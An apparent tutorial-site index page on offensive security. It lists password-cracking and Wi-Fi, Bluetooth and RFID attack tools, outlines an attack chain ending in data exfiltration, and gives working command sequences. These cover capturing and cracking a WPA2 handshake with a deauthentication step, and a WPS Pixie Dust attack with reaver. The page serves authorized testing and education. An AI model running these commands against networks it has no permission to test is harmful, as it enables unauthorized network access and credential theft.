Techzone/Attacks

Attacks

2 min readArticle

This section documents offensive security techniques, tools, and attack methodologies. Everything here is for authorized security testing, education, and understanding attack patterns to better defend against them.

Categories

Password Cracking

Breaking password hashes or brute-forcing authentication:

  • Offline tools — Hashcat, John the Ripper, RainbowCrack
  • Online tools — Hydra (live service brute force)
  • Wordlist generation — CeWL, Crunch, WYD, RSMangler

Wireless Hacking

Attacking WiFi, Bluetooth, and other RF protocols:

  • WiFi hacking — WPA/WPA2/WPA3, WPS, evil twin, deauth
  • SDR — Software Defined Radio for RF analysis
  • Bluetooth — BLE and classic Bluetooth attacks
  • RFID/NFC — Card cloning and relay attacks
  • HackRF — SDR hardware for active RF attacks

Attack Methodology (General)

The Attack Chain

shell
Recon → Scanning → Exploitation → Post-Exploitation → Persistence → Exfil
  1. Reconnaissance — gather information (passive + active)
  2. Scanning — identify open ports, services, vulnerabilities
  3. Exploitation — gain initial access
  4. Post-exploitation — escalate privileges, move laterally
  5. Persistence — maintain access
  6. Exfiltration — extract data of interest

Key Principles

  • Least privilege — request/use only the access needed
  • Stealth vs speed — quieter attacks take longer but evade detection
  • Documentation — log everything for reporting
  • Stay in scope — never exceed authorized boundaries

Tools by Category

Category Tool Use
Password cracking Hashcat GPU-accelerated offline cracking
Password cracking John the Ripper Versatile offline cracker
Password cracking Hydra Online brute forcing
WiFi Aircrack-ng suite Complete WiFi attack toolkit
WiFi Reaver/Bully WPS attacks
WiFi Wifite Automated WiFi attacks
WiFi Airgeddon Menu-driven WiFi attacks
Packet analysis Wireshark/TShark Capture and analyze
Packet crafting Scapy Custom packet injection
Network scan Nmap Port/service discovery
Recon Kismet Passive wireless monitoring

Quick Reference — Common Attack Flows

WPA2 Handshake Capture + Crack

bash
# 1. Monitor mode
airmon-ng start wlan0

# 2. Find target
airodump-ng wlan0mon

# 3. Capture
airodump-ng -c 6 --bssid TARGET_BSSID -w capture wlan0mon

# 4. Deauth to force handshake
aireplay-ng -0 10 -a TARGET_BSSID wlan0mon

# 5. Crack
aircrack-ng -w rockyou.txt capture-01.cap

WPS Pixie Dust

bash
wash -i wlan0mon   # Find WPS-enabled APs
reaver -i wlan0mon -b BSSID -K 1 -vv

See Also

  • ../osint-and-recon/index - Reconnaissance first
  • ../networking/index - Networking fundamentals
techzonesite.comUnlock Your IT Potential